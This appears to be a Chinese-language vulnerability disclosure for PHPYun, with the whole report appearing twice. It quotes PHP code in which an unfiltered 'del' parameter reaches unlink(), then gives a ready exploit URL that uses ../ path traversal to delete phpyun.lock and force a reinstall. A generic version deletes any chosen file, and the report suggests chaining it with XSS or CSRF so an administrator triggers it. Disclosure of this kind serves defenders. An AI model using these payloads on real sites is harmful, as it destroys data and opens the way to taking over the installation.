VULHUB ™

### 简要描述： RT ### 详细说明： /admin/model/com_member.class.php，279行开始： ``` function del_action() { if($_GET["delsub"]){ $del=$_GET["del"]; if($del){ if(@is_array($del)){ $uids = @implode(",",$del); foreach($del as $k=>$v){ $this->obj->delfiledir("..https://images.seebug.org/upload/tel/".$v); ``` $_GET["del"]没有做任何过滤，进入delfiledir()前，$v没有过滤 /model/class/action.class.php，709行开始： ``` function delfiledir($delfiles){ if(is_file($delfiles)){ @unlink($delfiles); ``` $delfiles进入unlink()前未过滤 可利用../等跨目录删除任意文件，如：删除install.lock后可进行重装 ``` http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../data/phpyun.lock ``` 需要结合XSS/CSRF，让管理员点击触发。 ### 漏洞证明： ``` http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../data/phpyun.lock ``` 结合XSS，CSRF等让管理员触发，删除install.lock，导致重装 exp： ``` http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../[任意文件路径] ```

### 简要描述： RT ### 详细说明： /admin/model/com_member.class.php，279行开始： ``` function del_action() { if($_GET["delsub"]){ $del=$_GET["del"]; if($del){ if(@is_array($del)){ $uids = @implode(",",$del); foreach($del as $k=>$v){ $this->obj->delfiledir("..https://images.seebug.org/upload/tel/".$v); ``` $_GET["del"]没有做任何过滤，进入delfiledir()前，$v没有过滤 /model/class/action.class.php，709行开始： ``` function delfiledir($delfiles){ if(is_file($delfiles)){ @unlink($delfiles); ``` $delfiles进入unlink()前未过滤 可利用../等跨目录删除任意文件，如：删除install.lock后可进行重装 ``` http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../data/phpyun.lock ``` 需要结合XSS/CSRF，让管理员点击触发。 ### 漏洞证明： ``` http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../data/phpyun.lock ``` 结合XSS，CSRF等让管理员触发，删除install.lock，导致重装 exp： ``` http://localhost/phpyun/admin/index.php?M=com_member&C=del&delsub=1&del[]=../../[任意文件路径] ```